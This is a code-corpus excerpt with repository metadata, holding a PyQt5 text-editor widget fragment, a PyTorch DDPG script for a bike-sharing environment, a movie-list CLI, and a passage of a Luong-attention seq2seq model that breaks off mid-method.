# http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@tools@customcompleter@customcompleter.py/92/PyQt5.QtWidgets.QTextEdit.textCursor
# http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@richtext@textedit@textedit.py/87/PyQt5.QtWidgets.QTextEdit.setFocus
# Ejemplos:
# https://stackoverflow.com/questions/31610351/qplaintextedit-thinks-its-modified-if-it-has-an-empty-text
# https://john.nachtimwald.com/2009/08/19/better-qplaintextedit-with-line-numbers/
# https://github.com/Werkov/PyQt4/blob/master/examples/demos/textedit/textedit.py
def __init__(self, parent, path=""):
#super().__init__()
super(TextEdit, self).__init__(parent)
self.parent = parent
self.path = path
font = QFont("Monospace", 8) #QFont()
#font.setFamily("Monospace")
font.setStyleHint(QFont.Monospace)
font.setStyle(QFont.StyleNormal)
font.setStyleStrategy(QFont.PreferDefault)
font.setWeight(QFont.ExtraLight)
font.setCapitalization(QFont.MixedCase)
font.setHintingPreference(QFont.PreferDefaultHinting)
font.setLetterSpacing(QFont.PercentageSpacing, 100.0)
font.setStretch(QFont.AnyStretch)
font.setBold(False)
font.setFixedPitch(True)
font.setItalic(False)
font.setKerning(True)
font.setOverline(False) # sobrelinea
#font.setPixelSize(8) #font.setPointSize(8) font.setPointSizeF(8)
font.setStrikeOut(False) # tachado
#font.setStyleName()
font.setUnderline(False)
#font.setWordSpacing(1)
print(font.toString())
charFormat = QTextCharFormat()
charFormat.setFont(font)
#self.setTabStopWidth(4)
self.setCursorWidth(5)
self.setCurrentCharFormat(charFormat)
#print(self.document().defaultTextOption())
#FIXME: Usaremos qss
pal = QPalette()
bgc = QColor(39, 40, 34)
pal.setColor(QPalette.Base, bgc)
textc = QColor(255, 255, 255)
pal.setColor(QPalette.Text, textc)
self.setPalette(pal)
self.setLineWrapMode(QPlainTextEdit.NoWrap)
#self.setTextBackgroundColor(QColor(0, 255, 255))
#self.setTextColor(QColor(0, 255, 255))
#self.setFontWeight(QFont.Normal)
#cursor = self.textCursor()
#cursor.movePosition(QTextCursor.End)
#self.setDocumentTitle("Coso")
#self.syntaxHighlighter = PythonHighlighter(self.document())
# Señales
#self.blockCountChanged.connect(self.__newBlock)
#self.cursorPositionChanged.connect()
#self.selectionChanged.connect(self.__changedSelection)
#self.textChanged.connect(self.__changedText)
#self.updateRequest.connect((const QRect &rect, int dy)
#self.modificationChanged.connect(self.__chanedModification)
#self.copyAvailable.connect(self.__copyAvailable)
#self.undoAvailable.connect(self.__undoAvailable)
#self.redoAvailable.connect(self.__redoAvailable)
if os.path.exists(self.path):
file = open(self.path, 'r')
data = file.read()
texto = self.__limpiar_codigo(data)
self.setPlainText(texto)
self.document().setModified(data != texto)
if data != texto:
print("El texto fue corregido al abrir el archivo.")
else:
self.setPlainText("#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n")
self.document().setModified(True)
self.setFocus()
def getStatus(self):
"""
Si se modifica el texto, se puede guardar.
"""
return{
"modified": self.document().isModified(),
}
#def __chanedModification(self, changed):
# pass
# #print("Document changed:", changed)
#def __changedSelection(self):
# cursor = self.textCursor()
# selected = cursor.selectionEnd()-cursor.selectionStart()
# self.canSelectAll = selected < len(self.toPlainText())
#def __copyAvailable(self, available):
# self.canCopy = available
#def __undoAvailable(self, available):
# pass
# #print("Undo:", available)
#def __redoAvailable(self, available):
# pass
# #print("Redo:", available)
def keyPressEvent(self, event):
# https://doc.qt.io/qt-5/qt.html#Key-enum
if event.key() == Qt.Key_Tab:
event.ignore()
event.accept = True
for x in range(0, 4):
newevent = QKeyEvent(QEvent.KeyPress, Qt.Key_Space,
Qt.NoModifier, text=" ", autorep=False, count=1)
QApplication.postEvent(self, newevent)
else:
super(TextEdit, self).keyPressEvent(event)
event.accept = True
self.setFocus()
'''
def __newBlock(self, newBlockCount):
#print(newBlockCount)
def __changedText(self):
text = self.document().toPlainText()
text = self.__limpiar_codigo(text)
#self.setPlainText(text)
print(text, self.document().size())
'''
def __limpiar_codigo(self, texto):
limpio = ""
for line in texto.splitlines():
text_line = "%s\n" % (line.rstrip())
ret = text_line.replace("\t", " ")
for l in ret:
limpio = "%s%s" % (limpio, l)
return limpio | [
"fdanesse@gmail.com"
] | fdanesse@gmail.com |
554fcbec6789d459cf126740714d10da4e25a624 | 759e5e433a451ce21df48460e3e20a2d51006c0c | /3_zone_env/ddpg_pytorch_3zone_canWork.py | 7038fac2d9502ceb3442c19306ecdcd1b92255b8 | [] | no_license | maile2108/DDPG-With-EnvBSS | 4b717e77cadc8911e433c8b458d7706c12707172 | ccc0511e3774b264ea5f5a4b89959e8fba62e6c0 | refs/heads/master | 2023-02-26T02:26:54.431693 | 2021-01-30T05:36:10 | 2021-01-30T05:36:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,423 | py | '''
torch = 0.41
'''
from cvxpylayers.torch import CvxpyLayer
import torch
import cvxpy as cp
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import gym
import time
import matplotlib.pyplot as plt
import random
import gym_BSS # noqa: F401
import os
##################### hyper parameters ####################
MAX_EPISODES = 5000 # 200
MAX_EP_STEPS = 200
LR_A = 0.001 # learning rate for actor
LR_C = 0.002 # learning rate for critic
GAMMA = 0.9 # reward discount
TAU = 0.01 # 0.01 # soft replacement
MEMORY_CAPACITY = 1000 # 10000
c = 1 # 0.1
BATCH_SIZE = 64 # 32
RENDER = False
random_seed = 1
# ENV_NAME = 'Pendulum-v0'
ENV_NAME = 'BSSEnvTest-v0'
EVAL = True
eval_freq = 5000
SAVE_FILE = True
##################### global variables ####################
env = gym.make(ENV_NAME)
env = env.unwrapped
env.seed(1)
s_dim = env.observation_space.shape[0]
a_dim = env.action_space.shape[0]
a_bound = env.action_space.high
# store action before and after optLayer
before_opt = []
after_opt = []
##################### random seed ####################
torch.manual_seed(random_seed)
env.seed(random_seed)
np.random.seed(random_seed)
random.seed(random_seed)
env.action_space.seed(random_seed)
#################### testing part #################################
def evaluation(ddpg, filepath, eval_episode=10):
avg_reward = 0
avg = []
eval_env = gym.make(ENV_NAME)
eval_action = []
eval_state = []
# eval_env = env
eval_env.seed(random_seed + 100)
for eptest in range(eval_episode):
running_reward = 0
done = False
s = np.round(eval_env.reset())
while not done:
a_float = ddpg.choose_action(s, None)
a = torch.round(a_float)
diff = abs(torch.sum(a) - env.nbikes)
if torch.sum(a) < env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] + diff <= a_bound[a_idx]:
a[a_idx] += diff
break
elif torch.sum(a) > env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] - diff >= 0:
a[a_idx] -= diff
break
s_, r, done, info = eval_env.step(a)
s = s_
running_reward = running_reward + r
print('Episode {}\tReward: {} \t AvgReward'.format(eptest, running_reward))
avg_reward = avg_reward + running_reward
avg.append(running_reward)
avg_reward = avg_reward / eval_episode
print("------------------------------------------------")
print("Evaluation average reward :", avg_reward)
print("------------------------------------------------")
if SAVE_FILE:
np.save(filepath+'/{}bike_seed{}_memory{}_eval_action'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(eval_action))
np.save(filepath+'/{}bike_seed{}_memory{}_eval_state'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(eval_state))
return avg_reward
############################### DDPG ####################################
class AdaptiveParamNoiseSpec(object):
def __init__(self, initial_stddev=0.1, desired_action_stddev=0.2, adaptation_coefficient=1.01):
"""
Note that initial_stddev and current_stddev refer to std of parameter noise,
but desired_action_stddev refers to (as name notes) desired std in action space
"""
self.initial_stddev = initial_stddev
self.desired_action_stddev = desired_action_stddev
self.adaptation_coefficient = adaptation_coefficient
self.current_stddev = initial_stddev
def adapt(self, distance):
if distance > self.desired_action_stddev:
# Decrease stddev.
self.current_stddev /= self.adaptation_coefficient
else:
# Increase stddev.
self.current_stddev *= self.adaptation_coefficient
def get_stats(self):
stats = {
'param_noise_stddev': self.current_stddev,
}
return stats
def __repr__(self):
fmt = 'AdaptiveParamNoiseSpec(initial_stddev={}, desired_action_stddev={}, adaptation_coefficient={})'
return fmt.format(self.initial_stddev, self.desired_action_stddev, self.adaptation_coefficient)
def ddpg_distance_metric(actions1, actions2):
"""
Compute "distance" between actions taken by two policies at the same states
Expects numpy arrays
"""
diff = actions1-actions2
mean_diff = np.mean(np.square(diff), axis=0)
dist = sqrt(np.mean(mean_diff))
return dist
def hard_update(target, source):
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
class OptLayer(torch.nn.Module):
def __init__(self, D_in, D_out):
super(OptLayer, self).__init__()
self.W = torch.nn.Parameter(1e-3*torch.randn(D_out, D_in))
self.b = torch.nn.Parameter(1e-3*torch.randn(D_out))
u = torch.as_tensor(a_bound)
y = cp.Variable(D_out)
Wtilde = cp.Variable((D_out, D_in))
W = cp.Parameter((D_out, D_in))
b = cp.Parameter(D_out)
x = cp.Parameter(D_in)
obj = cp.Minimize(cp.sum_squares(Wtilde @ x - b - y))
cons = [cp.sum(y) == env.nbikes, 0 <= y, y <= u, Wtilde == W]
prob = cp.Problem(obj, cons)
self.layer = CvxpyLayer(prob, [W, b, x], [y])
def forward(self, x):
# when x is batched, repeat W and b
if x.ndim == 2:
batch_size = x.shape[0]
return self.layer(self.W.repeat(batch_size, 1, 1), self.b.repeat(batch_size, 1), x)[0]
else:
return self.layer(self.W, self.b, x)[0]
class ANet(nn.Module): # ae(s)=a
def __init__(self, s_dim, a_dim):
super(ANet, self).__init__()
self.fc1 = nn.Linear(s_dim, 32)
# self.fc1.weight.data.normal_(0, 0.1) # initialization
self.fc2 = nn.Linear(32, 32)
# self.fc2.weight.data.normal_(0, 0.1) # initialization
self.out = nn.Linear(32, a_dim)
# self.out.weight.data.normal_(0, 0.1) # initialization
self.opt_layer = OptLayer(a_dim, a_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.out(x)
x = F.tanh(x)
# actions_value = x*2
# print('x: ', x)
# print('a_bound: ', a_bound)
# actions_value = x * a_bound
actions_value = x * 35
# print('=============')
# print('before opt: ', actions_value.data.numpy())
before_opt.append(actions_value.data.numpy())
# np.save('bike3_action_before', before_opt)
# opt_action = OptLayer(a_dim, a_dim)(x)
opt_action = self.opt_layer(actions_value)
# print('after opt: ', opt_action.data.numpy())
after_opt.append(opt_action.data.numpy())
# np.save('bike3_action_after', after_opt)
return opt_action
class CNet(nn.Module): # ae(s)=a
def __init__(self, s_dim, a_dim):
super(CNet, self).__init__()
'''
self.fcs = nn.Linear(s_dim, 32)
self.fca = nn.Linear(a_dim, 32)
self.fc2 = nn.Linear(32, 32)
self.out = nn.Linear(32, 1)
'''
self.l1 = nn.Linear(s_dim, 32)
self.l2 = nn.Linear(32 + a_dim, 32)
self.l3 = nn.Linear(32, 1)
def forward(self, s, a):
'''
x = self.fcs(s)
y = self.fca(a)
net = F.relu(x+y)
z = self.fc2(net)
z = F.relu(z)
actions_value = self.out(z)
return actions_value
'''
q = F.relu(self.l1(s))
q = F.relu(self.l2(torch.cat([q, a], 1)))
return self.l3(q)
class DDPG(object):
def __init__(self, a_dim, s_dim, a_bound,):
self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,
self.memory = np.zeros(
(MEMORY_CAPACITY, s_dim * 2 + a_dim + 1), dtype=np.float32)
self.pointer = 0
# self.sess = tf.Session()
self.Actor_eval = ANet(s_dim, a_dim) # .type(torch.IntTensor)
self.Actor_target = ANet(s_dim, a_dim) # .type(torch.IntTensor)
self.Actor_perturbed = ANet(s_dim, a_dim) # .type(torch.IntTensor)
self.Critic_eval = CNet(s_dim, a_dim) # .type(torch.IntTensor)
self.Critic_target = CNet(s_dim, a_dim) # .type(torch.IntTensor)
self.ctrain = torch.optim.Adam(self.Critic_eval.parameters(), lr=LR_C)
self.atrain = torch.optim.Adam(self.Actor_eval.parameters(), lr=LR_A)
self.loss_td = nn.MSELoss()
def choose_action(self, s, para):
s = torch.unsqueeze(torch.FloatTensor(s), 0)
# s = torch.unsqueeze(torch.IntTensor(s), 0)
# self.Actor_eval.eval()
# self.Actor_perturbed.eval()
if para is None:
return self.Actor_eval(s)[0].detach() # ae(s)
else:
return self.Actor_perturbed(s)[0].detach()
def learn(self):
for x in self.Actor_target.state_dict().keys():
eval('self.Actor_target.' + x + '.data.mul_((1-TAU))')
eval('self.Actor_target.' + x +
'.data.add_(TAU*self.Actor_eval.' + x + '.data)')
for x in self.Critic_target.state_dict().keys():
eval('self.Critic_target.' + x + '.data.mul_((1-TAU))')
eval('self.Critic_target.' + x +
'.data.add_(TAU*self.Critic_eval.' + x + '.data)')
# soft target replacement
# self.sess.run(self.soft_replace) # 用ae、ce更新at,ct
record_range = min(self.pointer+1, MEMORY_CAPACITY)
indices = np.random.choice(record_range, size=BATCH_SIZE)
bt = self.memory[indices, :]
# '''
bs = torch.FloatTensor(bt[:, :self.s_dim])
ba = torch.FloatTensor(bt[:, self.s_dim: self.s_dim + self.a_dim])
br = torch.FloatTensor(bt[:, -self.s_dim - 1: -self.s_dim])
bs_ = torch.FloatTensor(bt[:, -self.s_dim:])
# '''
'''
bs = torch.IntTensor(bt[:, :self.s_dim])
ba = torch.IntTensor(bt[:, self.s_dim: self.s_dim + self.a_dim])
br = torch.IntTensor(bt[:, -self.s_dim - 1: -self.s_dim])
bs_ = torch.IntTensor(bt[:, -self.s_dim:])
'''
a = self.Actor_eval(bs)
# loss=-q=-ce(s,ae(s))更新ae ae(s)=a ae(s_)=a_
q = self.Critic_eval(bs, a)
# 如果 a是一个正确的行为的话,那么它的Q应该更贴近0
loss_a = -torch.mean(q)
# print('q: ', q)
# print('loss_a: ', loss_a)
self.atrain.zero_grad()
loss_a.backward()
self.atrain.step()
# print('atrain grad: ', self.atrain.grad)
# print("===================")
# for p in self.Actor_eval.parameters():
# print(p.name, p.requires_grad, p.grad.norm())
# 这个网络不及时更新参数, 用于预测 Critic 的 Q_target 中的 action
a_ = self.Actor_target(bs_)
# 这个网络不及时更新参数, 用于给出 Actor 更新参数时的 Gradient ascent 强度
q_ = self.Critic_target(bs_, a_)
q_target = br+GAMMA*q_ # q_target = 负的
# print('q_target: ', q_target)
q_v = self.Critic_eval(bs, ba)
# print('q_v: ', q_v)
td_error = self.loss_td(q_target, q_v)
# td_error=R + GAMMA * ct(bs_,at(bs_))-ce(s,ba) 更新ce ,但这个ae(s)是记忆中的ba,让ce得出的Q靠近Q_target,让评价更准确
# print('td_error: ', td_error)
self.ctrain.zero_grad()
td_error.backward()
self.ctrain.step()
def store_transition(self, s, a, r, s_):
transition = np.hstack((s, a, [r], s_))
# replace the old memory with new memory
index = self.pointer % MEMORY_CAPACITY
self.memory[index, :] = transition
self.pointer += 1
def perturb_actor_parameters(self, param_noise):
"""Apply parameter noise to actor model, for exploration"""
hard_update(self.Actor_perturbed, self.Actor_eval)
params = self.Actor_perturbed.state_dict()
for name in params:
if 'ln' in name:
pass
param = params[name]
random = torch.randn(param.shape)
# if use_cuda:
# random = random.cuda()
param += random * param_noise.current_stddev
############################### training ####################################
filepath = "./pytorch_result_{}".format(MEMORY_CAPACITY)
if not os.path.exists(filepath):
os.mkdir(filepath)
Rs = []
ewma_reward = 0 # EWMA reward for tracking the learning progress
ewma_reward_s = []
eva_reward = []
store_action = []
store_state = []
param_noise = AdaptiveParamNoiseSpec(
initial_stddev=0.05, desired_action_stddev=0.3, adaptation_coefficient=1.05)
# param_noise = None
ddpg = DDPG(a_dim, s_dim, a_bound)
var = 3 # control exploration
t1 = time.time()
for i in range(MAX_EPISODES):
s = np.round(env.reset())
old_s = s
ep_reward = 0
done = False
j = 0
noise_counter = 0
if param_noise is not None:
ddpg.perturb_actor_parameters(param_noise)
# for j in range(MAX_EP_STEPS):
while not done:
if RENDER:
env.render()
# Add exploration noise
a_float = ddpg.choose_action(s, param_noise)
# Make it int and sum up to nbikes
a = torch.round(a_float)
diff = abs(torch.sum(a) - env.nbikes)
if torch.sum(a) < env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] + diff <= a_bound[a_idx]:
a[a_idx] += diff
break
elif torch.sum(a) > env.nbikes:
for a_idx in range(a_dim):
if a[a_idx] - diff >= 0:
a[a_idx] -= diff
break
# print('===========In main: ===============')
# print('s = ', s)
# print('old a = ', a_float)
# print('a = ', a)
# add randomness to action selection for exploration
# a = np.clip(np.random.normal(a, var), -2, 2)
# print('a: ', a)
# print('store_action: ', store_action)
store_action.append(a.numpy())
store_state.append((s))
s_, r, done, info = env.step(a)
ddpg.store_transition(s, a, r, s_)
if ddpg.pointer > c*MEMORY_CAPACITY:
var *= .9995 # decay the action randomness
# print('learn!!!!')
ddpg.learn()
if EVAL and (ddpg.pointer + 1) % eval_freq == 0:
eva_reward.append(evaluation(ddpg, filepath))
noise_counter += 1
old_s = s
s = s_
ep_reward += r
'''
if j == MAX_EP_STEPS-1:
print('Episode:', i, ' Reward: %i' %
int(ep_reward), 'Explore: %.2f' % var, )
if ep_reward > -300:
RENDER = True
break
j += 1
'''
ewma_reward = 0.05 * ep_reward + (1 - 0.05) * ewma_reward
# print('===========In main: ===============')
# print('s = ', old_s)
# # print('old a = ', a_float)
# print('a = ', a)
print({
'episode': i,
'ewma reward': ewma_reward,
# 'ep reward': R,
'Explore': var
})
Rs.append(ep_reward)
ewma_reward_s.append(ewma_reward)
if SAVE_FILE:
np.save(filepath+'/{}bike_seed{}_memory{}_episode_reward'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(Rs))
np.save(filepath+'/{}bike_seed{}_memory{}_ewma_reward'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(ewma_reward_s))
np.save(filepath+'/{}bike_seed{}_memory{}_action'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(store_action))
np.save(filepath+'/{}bike_seed{}_memory{}_state'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(store_state))
np.save(filepath+'/{}bike_seed{}_memory{}_before_opt'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(before_opt))
np.save(filepath+'/{}bike_seed{}_memory{}_after_opt'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(after_opt))
if EVAL:
np.save(filepath+'/{}bike_seed{}_memory{}_eval_reward'.format(a_dim, random_seed, MEMORY_CAPACITY), np.array(eva_reward))
Rs = np.array(Rs)
ewma_reward_s = np.array(ewma_reward_s)
print('')
print('---------------------------')
print('Average reward per episode:', np.average(Rs))
"""
Save model
"""
# np.save('ewma_reward', ewma_reward_s)
# np.save('ep_reward', Rs)
xAxis = np.arange(MAX_EPISODES)
yAxis = ewma_reward_s
plt.plot(xAxis, yAxis)
plt.title('Memory: {}, Batch size: {}, Episode: {}'.format(
MEMORY_CAPACITY, BATCH_SIZE, MAX_EPISODES))
plt.xlabel('Episode')
plt.ylabel('EWMA Reward')
plt.show()
# print('Running time: ', time.time() - t1)
| [
"sandy861003@gmail.com"
] | sandy861003@gmail.com |
649cdbedd9d4b388cfba6bf8e5268e049d220b82 | 336b5320dc184a8e7fa41a52b22faf656d1db671 | /ch17/movies/ui.py | cf0e68924c778558bbd2d49f6234a49532c8c666 | [
"MIT"
] | permissive | nemanjaunkovic/SolutionsMurachPythonProgramming | 59e9c1d496735643e257cac2ced0c54fd669aaa0 | 4f30c334c626ab7f3304e81fc15e81aa38363541 | refs/heads/master | 2021-05-16T13:51:38.910130 | 2018-01-24T21:06:10 | 2018-01-24T21:06:10 | 117,701,811 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | #!/usr/bin/env/python3
import db
from objects import Movie
def display_title():
print("The Movie List program")
print()
display_menu()
def display_menu():
print("COMMAND MENU")
print("cat - View movies by category")
print("year - View movies by year")
print("add - Add a movie")
print("del - Delete a movie")
print("exit - Exit program")
print()
def display_categories():
print("CATEGORIES")
categories = db.get_categories()
for category in categories:
print(str(category.id) + ". " + category.name)
print()
def display_movies(movies, title_term):
print("MOVIES - " + title_term)
line_format = "{:3s} {:37s} {:6s} {:5s} {:10s}"
print(line_format.format("ID", "Name", "Year", "Mins", "Category"))
print("-" * 64)
for movie in movies:
print(line_format.format(str(movie.id), movie.name,
str(movie.year), str(movie.minutes),
movie.category.name))
print()
def display_movies_by_category():
category_id = int(input("Category ID: "))
category = db.get_category(category_id)
if category == None:
print("There is no category with that ID.\n")
else:
print()
movies = db.get_movies_by_category(category_id)
display_movies(movies, category.name.upper())
def display_movies_by_year():
year = int(input("Year: "))
print()
movies = db.get_movies_by_year(year)
display_movies(movies, str(year))
def add_movie():
name = input("Name: ")
year = int(input("Year: "))
minutes = int(input("Minutes: "))
category_id = int(input("Category ID: "))
category = db.get_category(category_id)
if category == None:
print("There is no category with that ID. Movie NOT added.\n")
else:
movie = Movie(name=name, year=year, minutes=minutes,
category=category)
db.add_movie(movie)
print(name + " was added to database.\n")
def delete_movie():
movie_id = int(input("Movie ID: "))
db.delete_movie(movie_id)
print("Movie ID " + str(movie_id) + " was deleted from database.\n")
def main():
db.connect()
display_title()
display_categories()
while True:
command = input("Command: ")
if command == "cat":
display_movies_by_category()
elif command == "year":
display_movies_by_year()
elif command == "add":
add_movie()
elif command == "del":
delete_movie()
elif command == "exit":
break
else:
print("Not a valid command. Please try again.\n")
display_menu()
db.close()
print("Bye!")
if __name__ == "__main__":
main()
| [
"nemanja_unkovic@yahoo.com"
] | nemanja_unkovic@yahoo.com |
4905b8b383ffb92231f4b346797d57075d31974b | 3fc23e1c82b48c7bbc84fae1df2d0a3f28cb3ba2 | /logicalforms/SP_emrQA/models/seq2seq_Luong.py | 48d68fc1de7eb8355b1ee001e2a086f807d8798e | [] | no_license | ndobb/AdvancingSeq2Seq | 29dae6a1a1d28a573f6f861ba036511e81bb94db | cb564e114ed7b062626797319b48a1c07a6e7cae | refs/heads/master | 2023-03-20T08:36:24.624388 | 2021-03-15T01:02:42 | 2021-03-15T01:02:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,986 | py | import torch
from torch import nn, optim
import torch.nn.functional as F
import numpy as np
from torch.autograd import Variable
import time
# import matplotlib
# matplotlib.use("Agg")
# Just modifying bowser model and making it a simple seq2seq network
USE_CUDA = True if torch.cuda.is_available() else False
class EncoderRNN(nn.Module):
def __init__(self, input_size, hidden_size, n_layers=1, dropout=0.1):
super(EncoderRNN, self).__init__()
# input_size is actually the vocab size
self.input_size = input_size
self.hidden_size = hidden_size
self.n_layers = n_layers
self.dropout = dropout
self.embedding = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, n_layers, batch_first=True, dropout=self.dropout, bidirectional=True)
def forward(self, input_seqs, input_lengths, hidden=None):
# Note: we run this all at once (over multiple batches of multiple sequences)
#input_seqs: [Batch x Seq]
#input_lengths: [Batch]
embedded = self.embedding(input_seqs) #embedded: [Batch x Seq]
packed = torch.nn.utils.rnn.pack_padded_sequence(embedded, input_lengths, batch_first=True)
outputs, hidden = self.gru(packed, hidden)
outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(outputs, batch_first=True) # unpack (back to padded)
#outputs = outputs[:, :, :self.hidden_size] + outputs[:, :, self.hidden_size:] # Sum bidirectional outputs
return outputs, hidden #encoder outpus: [Batch x Seq x hidden], hidden: not really used so does not matter
class Attn(nn.Module):
def __init__(self, method, hidden_size, soft=True, D= 0):
super(Attn, self).__init__()
self.method = method
self.hidden_size = hidden_size
self.soft = soft
if self.method == 'general':
self.attn = nn.Linear(self.hidden_size, hidden_size)
elif self.method == 'concat':
self.attn = nn.Linear(self.hidden_size * 2, hidden_size)
self.v = nn.Parameter(torch.randn(1,hidden_size,1))
if self.method == 'location':
self.attn = nn.Linear(self.hidden_size, 1)
if not(soft):
self.sig = nn.Sigmoid()
self.D = D
self.Vp = nn.Parameter(torch.randn(self.hidden_size, 1))
self.Wp = nn.Linear(self.hidden_size, self.hidden_size)
#Encoder is done once for all of B and all of S
#Decoder is done for all B but only 1 for s at a time.
def forward(self, hidden, encoder_outputs, X_lengths = None):
#hidden: current hidden state of the decoder [1 x Batch x hidden] (since not bidirectional)
#encoder_outputs : [Batch x Seq x hidden]
#hidden.transpose(0,1).transpose(1,2): [Batch x hidden x 1]
#print("encoder outputs shape", encoder_outputs.shape)
#print("hidden passed in", hidden.transpose(0,1).transpose(1,2).shape)
if self.method in ['dot', 'general', 'concat']:
attn_energies_3 = self.score_3(hidden.transpose(0,1).transpose(1,2), encoder_outputs)
attn_energies_3 = attn_energies_3.view(attn_energies_3.shape[0], attn_energies_3.shape[1])
#attn_energies_3: [Batch x Seq]
if USE_CUDA:
attn_energies_3 = attn_energies_3.cuda()
else:
hidden_2 = hidden.transpose(0,1) #hidden_2 : [Batch x 1 x hidden]
hidden_2 = hidden_2.expand(encoder_outputs.shape[0],encoder_outputs.shape[1],encoder_outputs.shape[2]) #hidden_2 : [Batch x Seq x Hidden]
attn_energies_3 = self.attn(hidden_2).squeeze(2) #Batch x seq
attn_energies_3 = attn_energies_3.cuda()
if not(self.soft):
pt = self.sig(F.tanh(self.Wp(hidden.squeeze(0)))).unsqueeze(1) #[Batch x 1 x hidden]
pt = pt.bmm(self.Vp.expand(pt.shape[0], self.Vp.shape[0], self.Vp.shape[1])).unsqueeze(1) #[Batch x1]
pt = torch.tensor(X_lengths) * pt #pt: [Batch]
pt = pt.expand(pt.shape[0],encoder_outputs.shape[1]) #[Batch x seq]
s = torch.tensor([[j >= pt - self.D and j <= pt + self.D for j in range(X_lengths[i])] + [0.0]*(encoder_outputs.shape[1]- X_lengths[i]) for i in range(encoder_outputs.shape[0])]) #[batch x length of each sequence]
pointer_coeffs = torch.exp(( s - pt )**2/(-2*(self.D/2)**2))
attn_energies_3 = attn_energies_3 * pointer_coeffs
return F.softmax(attn_energies_3, dim=1).unsqueeze(1)#[Batch x 1 x Seq]
# Normalize energies to weights in range 0 to 1, resize to Bx1xS
def score(self, hidden, encoder_output):
if self.method == 'dot':
energy = hidden.dot(encoder_output)
return energy
elif self.method == 'general':
energy = self.attn(encoder_output) #energy: [Batch x Seq x hidden]
energy = hidden.dot(energy) #hidden : [Batch x hidden x 1]
return energy
elif self.method == 'concat':
hidden = hidden.transpose(1,2) #hidden: [Batch x 1 x hidden]
energy = self.attn(torch.cat((hidden.expand(encoder_output.shape[0],encoder_output.shape[1],encoder_output.shape[2]), encoder_output), 2)) #energy: [Batch x Seq x hidden]
energy = self.v.expand(hidden.shape[0],hidden.shape[2],1).dot(energy)
return energy
def score_2(self, hidden, encoder_output):
if self.method == 'dot':
energy = hidden.dot(encoder_output)
return energy
elif self.method == 'general':
energy = self.attn(encoder_output)
energy = energy.matmul(hidden)
return energy
elif self.method == 'concat':
hidden = hidden.transpose(1,2) #hidden: [Batch x 1 x hidden]
energy = self.attn(torch.cat((hidden.expand(encoder_output.shape[0],encoder_output.shape[1],encoder_output.shape[2]), encoder_output), 2)) #energy: [Batch x Seq x hidden]
energy = energy.matmul(self.v.expand(hidden.shape[0],hidden.shape[2],1))
return energy
# Fully vectorized implementation - 'general' case
def score_3(self, hidden, encoder_output):
if self.method == 'dot':
energy = encoder_output.bmm(hidden)
return energy
elif self.method == 'general':
energy = self.attn(encoder_output) #energy: [Batch x Seq x hidden]
energy = energy.bmm(hidden) #hidden: [Batch x hidden x 1]
return energy
elif self.method == 'concat':
hidden = hidden.transpose(1,2) #hidden: [Batch x 1 x hidden]
energy = self.attn(torch.cat((hidden.expand(encoder_output.shape[0],encoder_output.shape[1],encoder_output.shape[2]), encoder_output), 2)) #energy: [Batch x Seq x hidden]
energy = energy.bmm(self.v.expand(hidden.shape[0],hidden.shape[2],1))
return energy
class LuongAttnDecoderRNN(nn.Module):
def __init__(self, attn_model, hidden_size, output_size, n_layers=1, dropout=0.1, bi=0, bert_sent=0):
super(LuongAttnDecoderRNN, self).__init__()
# Keep for reference
self.attn_model = attn_model
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.dropout = dropout
# Define layers
self.embedding = nn.Embedding(output_size, hidden_size*2)
self.embedding_dropout = nn.Dropout(dropout)
self.gru = nn.GRU(hidden_size*2, hidden_size*2, n_layers, dropout=dropout)
self.concat = nn.Linear(hidden_size * 4, hidden_size*2)
self.out = nn.Linear(hidden_size*2, output_size)
# Choose attention model
if attn_model != 'none':
self.attn = Attn(attn_model, hidden_size*2)
# =============================================================================
# self.word2vec = word2vec
# if word2vec == 1:
# word_vectors = torch.FloatTensor(word_vectors).cuda()
# self.embedding = self.embedding.from_pretrained(word_vectors)
# self.word2vec_lin = nn.Linear(300, hidden_size*2)
#
# =============================================================================
self.bert_sent = bert_sent
if bert_sent == 1:
self.bert_lin = nn.Linear(768, self.hidden_size*2)
self.bert_encoded_lin = nn.Linear(768, self.hidden_size*2)
#if bi == 1:
# self.W_bi = nn.Linear(hidden_size*2, hidden_size)
#else:
# pass
def forward(self, input_seq, last_hidden, encoder_outputs):
# Note: we run this one step at a time
# input_seq : [batch_size], something like torch.LongTensor([SOS_token] * small_batch_size)
# last_hidden: last elemnt of decoder_outputs [1 x batch_size x hidden]
# encoder_outputs: [batch_size x seq x hidden]
# Get the embedding of the current input word (last output word)
batch_size = input_seq.size(0)
embedded = self.embedding(input_seq)
embedded = self.embedding_dropout(embedded)
#No need for batch_irst = True in the gru because of the next line
embedded = embedded.view(1, batch_size, self.hidden_size*2) # embedded: [1 x Batch x hidden]
#if last_hidden.shape[-1] == self.hidden_size*2:
# last_hidden = self.W_bi(last_hidden)
#print("last hidden ", last_hidden.shape)
if len(last_hidden.shape) == 2:
last_hidden = last_hidden.unsqueeze(0)
if self.bert_sent == 1 and last_hidden.shape[-1] == 768:
last_hidden = self.bert_lin(last_hidden)
embedded = embedded.contiguous(); last_hidden = last_hidden.contiguous()
if self.bert_sent ==1:
